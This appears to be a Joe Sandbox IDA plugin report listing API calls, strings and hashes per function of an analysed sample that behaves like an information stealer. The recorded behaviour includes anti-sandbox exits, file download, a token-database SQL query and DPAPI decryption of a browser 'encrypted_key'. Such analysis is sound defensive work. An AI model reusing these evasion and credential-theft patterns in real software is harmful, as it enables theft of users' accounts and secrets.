Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 3a919a3725e60241041f75b93582f98994a433d23b3f32ebb3d555b18f14ad79
Instruction ID: 6911e5229e6f58258c2df317e40812a0a2009309787aa5692007264d193293ec
Opcode Fuzzy Hash: 3a919a3725e60241041f75b93582f98994a433d23b3f32ebb3d555b18f14ad79
Instruction Fuzzy Hash: 78316171D0514DDFCF19EBA0D999DBFB3B9AB44301B109028E252BB285DAB4AD44CB50

Function 00EF5FD0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01330368,00000000,?,00EFE7D4,00000000,?,00000000), ref: 00EF6000
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,01330368,00000000,?,00EFE7D4,00000000,?,00000000,00000000), ref: 00EF6007
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00EF6028
__aulldiv.LIBCMT ref: 00EF6042
__aulldiv.LIBCMT ref: 00EF6050
wsprintfA.USER32 ref: 00EF607C

Strings

%d MB, xrefs: 00EF6073
@, xrefs: 00EF601D

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: 922d12e23ed19b2ff80ad3329db07177e0b604612a6d4553fa4069248a648105
Instruction ID: c46daee384497cc15b715408444e2e884d9f7e499ab2e42c60a53b16240c9a60
Opcode Fuzzy Hash: 922d12e23ed19b2ff80ad3329db07177e0b604612a6d4553fa4069248a648105
Instruction Fuzzy Hash: D121E8B1D4430CABDB14DF94CC45BAEB7B8EB48B14F104519F715BB284C7B959008BA4

Function 00EE5D60 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

Part of subcall function 00EE4490: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4516
Part of subcall function 00EE4490: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4526

InternetOpenA.WININET(00EFE7CE,00000001,00000000,00000000,00000000), ref: 00EE5DCF
StrCmpCA.SHLWAPI(?,0132D788), ref: 00EE5E07
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EE5E4F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EE5E73
InternetReadFile.WININET(00EF1E53,?,00000400,?), ref: 00EE5E9C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EE5ECA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00EE5F09
InternetCloseHandle.WININET(00EF1E53), ref: 00EE5F13
InternetCloseHandle.WININET(00000000), ref: 00EE5F20

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: 754d4ab6b1e75f24a7d9f79b94d3922766038b85d42e4783d686834c3511615b
Instruction ID: 6d37fc38f13dc6d089573b5993222da05eec4c7c5ceccea4eb73b1c3a919bbf5
Opcode Fuzzy Hash: 754d4ab6b1e75f24a7d9f79b94d3922766038b85d42e4783d686834c3511615b
Instruction Fuzzy Hash: 26515EB1A1061CABDF24DF61CC45BEE7779AB04309F1080A9A605BB1C0DBB46F85CF65

Function 00EEB270 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

Part of subcall function 00EE9800: memcmp.MSVCRT ref: 00EE981B
Part of subcall function 00EE9800: memset.MSVCRT ref: 00EE984E
Part of subcall function 00EE9800: LocalAlloc.KERNEL32(00000040,?), ref: 00EE989E

lstrlen.KERNEL32(00000000), ref: 00EEB46D

Part of subcall function 00EF6D40: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF6D62

StrStrA.SHLWAPI(00000000,AccountId), ref: 00EEB49B
lstrlen.KERNEL32(00000000), ref: 00EEB573
lstrlen.KERNEL32(00000000), ref: 00EEB587

Strings

AccountTokens, xrefs: 00EEB339
SELECT service, encrypted_token FROM token_service, xrefs: 00EEB3DB
AccountTokens, xrefs: 00EEB2AA
AccountId, xrefs: 00EEB492

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: a412f7669f7e69649826cb27977900fc78412d94a3d7109c099441f5772ee186
Instruction ID: fb418954e8a9b2d35f7a77c790e92cf5e3dcc8c56654f13caf192c13b09e1eb6
Opcode Fuzzy Hash: a412f7669f7e69649826cb27977900fc78412d94a3d7109c099441f5772ee186
Instruction Fuzzy Hash: 87A1EF7291011C9BCF18FBA0DD96EFEB3B9AF14300F5051A9F606B2191EF746A48CB61

Function 00EF33E0 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0132FC90), ref: 00EF343B

Part of subcall function 00EF6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00EF6D1B

lstrcat.KERNEL32(?,00000000), ref: 00EF3461
lstrcat.KERNEL32(?,?), ref: 00EF3480
lstrcat.KERNEL32(?,?), ref: 00EF3494
lstrcat.KERNEL32(?,0132BB20), ref: 00EF34A7
lstrcat.KERNEL32(?,?), ref: 00EF34BB
lstrcat.KERNEL32(?,01331008), ref: 00EF34CF

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF6CA0: GetFileAttributesA.KERNEL32(00000000,?,00EEF807,?,00000000,?,00000000,00EFE783,00EFE782), ref: 00EF6CAF

Part of subcall function 00EF31E0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EF31F0
Part of subcall function 00EF31E0: HeapAlloc.KERNEL32(00000000), ref: 00EF31F7
Part of subcall function 00EF31E0: wsprintfA.USER32 ref: 00EF3213
Part of subcall function 00EF31E0: FindFirstFileA.KERNEL32(?,?), ref: 00EF322A

Strings

>B, xrefs: 00EF3553, 00EF34FE, 00EF3501

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID: >B
API String ID: 167551676-2635959191
Opcode ID: 640a29a6d5cef7ad887b89ceab353381ff255a3acf00bdc741f7cebe06028dd7
Instruction ID: 0bc644d956b4ead7df1c52d356f530743e1902a98a564cdf58298ddb5abe512a
Opcode Fuzzy Hash: 640a29a6d5cef7ad887b89ceab353381ff255a3acf00bdc741f7cebe06028dd7
Instruction Fuzzy Hash: 513162B294021C57CB29FBB0CC85EEA73BCAB48740F404599B755A6085EAB0A7C8CF94

Function 00EF4920 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01322B78), ref: 00EF7721
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01322D58), ref: 00EF773A
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01322B90), ref: 00EF7752
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01322BD8), ref: 00EF776A
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01322C68), ref: 00EF7783
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01321498), ref: 00EF779B
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,0131ADD0), ref: 00EF77B3
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,0131AE30), ref: 00EF77CC
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01322D88), ref: 00EF77E4
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01322BA8), ref: 00EF77FC
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01322C80), ref: 00EF7815
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01322AB8), ref: 00EF782D
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,0131AE70), ref: 00EF7845
Part of subcall function 00EF76E0: GetProcAddress.KERNEL32(74DD0000,01322C08), ref: 00EF785E

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EE1190: ExitProcess.KERNEL32 ref: 00EE11D1

Part of subcall function 00EE1120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00EF4947,00EFE4C7), ref: 00EE112A
Part of subcall function 00EE1120: ExitProcess.KERNEL32 ref: 00EE113E

Part of subcall function 00EE10D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00EF494C), ref: 00EE10EB
Part of subcall function 00EE10D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,00EF494C), ref: 00EE10F2
Part of subcall function 00EE10D0: ExitProcess.KERNEL32 ref: 00EE1103

Part of subcall function 00EE11E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EE11FE
Part of subcall function 00EE11E0: __aulldiv.LIBCMT ref: 00EE1218
Part of subcall function 00EE11E0: __aulldiv.LIBCMT ref: 00EE1226
Part of subcall function 00EE11E0: ExitProcess.KERNEL32 ref: 00EE1254

Part of subcall function 00EF46A0: GetUserDefaultLangID.KERNEL32(?,?,00EF4956,00EFE4C7), ref: 00EF46A4

GetUserDefaultLangID.KERNEL32 ref: 00EF4956

Part of subcall function 00EE1150: ExitProcess.KERNEL32 ref: 00EE1186

Part of subcall function 00EF5720: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EE1177), ref: 00EF5750
Part of subcall function 00EF5720: HeapAlloc.KERNEL32(00000000,?,?,?,00EE1177), ref: 00EF5757
Part of subcall function 00EF5720: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EF576F

Part of subcall function 00EF57B0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EF495B), ref: 00EF57E0
Part of subcall function 00EF57B0: HeapAlloc.KERNEL32(00000000,?,?,?,00EF495B), ref: 00EF57E7
Part of subcall function 00EF57B0: GetComputerNameA.KERNEL32(?,00000104), ref: 00EF57FF

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013214B8,?,00EFE988,?,00000000,?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF49FA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EF4A18
CloseHandle.KERNEL32(00000000), ref: 00EF4A29
Sleep.KERNEL32(00001770), ref: 00EF4A34
CloseHandle.KERNEL32(?,00000000,?,013214B8,?,00EFE988,?,00000000,?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF4A4A
ExitProcess.KERNEL32 ref: 00EF4A52

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1125299040-0
Opcode ID: 54d215d4d0cd35ba81144ab5ac8668eeed9856ea36e94e635ace524a25a3068d
Instruction ID: 1f8be0de3c2839d3ae076f205c029598ca930a9c50888b1890eef9babe2a18f8
Opcode Fuzzy Hash: 54d215d4d0cd35ba81144ab5ac8668eeed9856ea36e94e635ace524a25a3068d
Instruction Fuzzy Hash: 6F312D7194020CAADF18FBF0D956BBEB7B9AF14340F506569F312B21C1DFB06A448B65

Function 00EF62AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EF62F6
wsprintfA.USER32 ref: 00EF6329
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00EF634B
RegCloseKey.ADVAPI32(00000000), ref: 00EF635C
RegCloseKey.ADVAPI32(00000000), ref: 00EF6369

Part of subcall function 00EF85C0: lstrcpy.KERNEL32(?,00000000), ref: 00EF8606

RegQueryValueExA.KERNEL32(00000000,013302A8,00000000,000F003F,?,00000400), ref: 00EF63BC
lstrlen.KERNEL32(?), ref: 00EF63D1
RegQueryValueExA.KERNEL32(00000000,013302D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00EFE500), ref: 00EF6469
RegCloseKey.KERNEL32(00000000), ref: 00EF64D8
RegCloseKey.ADVAPI32(00000000), ref: 00EF64EA

Strings

%s\%s, xrefs: 00EF631D

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 2c0eb90a0a3362434bc2222b621d21084a85bbb8919140c753a146abc863e304
Instruction ID: 173aed4249fb1444e16cc402ff3cd00e6114fd252a8afd35c240d3ceece36ffe
Opcode Fuzzy Hash: 2c0eb90a0a3362434bc2222b621d21084a85bbb8919140c753a146abc863e304
Instruction Fuzzy Hash: C4212C71A0021C9BDB68DB54DC85FE9B3B9FB48700F00C1E8A609A6184DF75AA85CFE4

Function 00EF2D70 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00EF2D95
RegOpenKeyExA.KERNEL32(80000001,01330EE8,00000000,00020119,?), ref: 00EF2DB4
RegQueryValueExA.ADVAPI32(?,0132FD80,00000000,00000000,00000000,000000FF), ref: 00EF2DD8
RegCloseKey.ADVAPI32(?), ref: 00EF2DE2
lstrcat.KERNEL32(?,00000000), ref: 00EF2E07
lstrcat.KERNEL32(?,0132FF18), ref: 00EF2E1B

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 7ae3049546f1124aafd979650edbf45c57af2082b0eca1ba3c78c0dbea1c2264
Instruction ID: f568a691b3aeb0900792a1d7c573723fbcfdce99da7e73405770274acc812bd4
Opcode Fuzzy Hash: 7ae3049546f1124aafd979650edbf45c57af2082b0eca1ba3c78c0dbea1c2264
Instruction Fuzzy Hash: BD4128B6D0010C67CF19EBA0DC96EEE777EAB88700F04455DB72A56145EBB05BC8CB91

Function 00EE93C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE93EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9411
LocalAlloc.KERNEL32(00000040,?), ref: 00EE9431
ReadFile.KERNEL32(000000FF,?,00000000,00EEF9B7,00000000), ref: 00EE945A
LocalFree.KERNEL32(00EEF9B7), ref: 00EE9490
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00EE949A

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: d3e1c0a2884c3ecd3cad4b3b4ff59fe31a257845f8b452053d3b49f0121fbfd7
Instruction ID: de8261664577d7c36cf1e5e12fb26adec9dd5f87dbfbc2da8a66853db4d8f15d
Opcode Fuzzy Hash: d3e1c0a2884c3ecd3cad4b3b4ff59fe31a257845f8b452053d3b49f0121fbfd7
Instruction Fuzzy Hash: 76310CB4E0020DEFDB24CF95C885BAEB7B5AF48314F108158E921A72D4D774AD81CFA1

Function 00EE11E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EE11FE
__aulldiv.LIBCMT ref: 00EE1218
__aulldiv.LIBCMT ref: 00EE1226
ExitProcess.KERNEL32 ref: 00EE1254

Strings

@, xrefs: 00EE11F3

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 288f96b3f44b5a590d9680746e46f7fb2890aae3da08fac3a49197cf4949b665
Instruction ID: 8da41cdc41677edaad350b7ddf9420032b865af1ddac0adc6e97582848bff4a8
Opcode Fuzzy Hash: 288f96b3f44b5a590d9680746e46f7fb2890aae3da08fac3a49197cf4949b665
Instruction Fuzzy Hash: B2014BB0D4034CFBEF14DBD0CC4AB9DBBB8AB58705F209098E704BA180D7B456849B59

Function 00EE96E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EE93C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE93EC
Part of subcall function 00EE93C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9411
Part of subcall function 00EE93C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9431
Part of subcall function 00EE93C0: ReadFile.KERNEL32(000000FF,?,00000000,00EEF9B7,00000000), ref: 00EE945A
Part of subcall function 00EE93C0: LocalFree.KERNEL32(00EEF9B7), ref: 00EE9490
Part of subcall function 00EE93C0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00EE949A

Part of subcall function 00EF6D40: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF6D62

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EE9739

Part of subcall function 00EE94C0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00EE4BCE,00000000,00000000), ref: 00EE94EF
Part of subcall function 00EE94C0: LocalAlloc.KERNEL32(00000040,?,?,?,00EE4BCE,00000000,?), ref: 00EE9501
Part of subcall function 00EE94C0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00EE4BCE,00000000,00000000), ref: 00EE952A
Part of subcall function 00EE94C0: LocalFree.KERNEL32(?,?,?,?,00EE4BCE,00000000,?), ref: 00EE953F

memcmp.MSVCRT ref: 00EE9792

Part of subcall function 00EE9560: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE9584
Part of subcall function 00EE9560: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EE95A3
Part of subcall function 00EE9560: LocalFree.KERNEL32(?), ref: 00EE95CF

Strings

, xrefs: 00EE97C1
"encrypted_key":", xrefs: 00EE9730
DPAPI, xrefs: 00EE9789

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
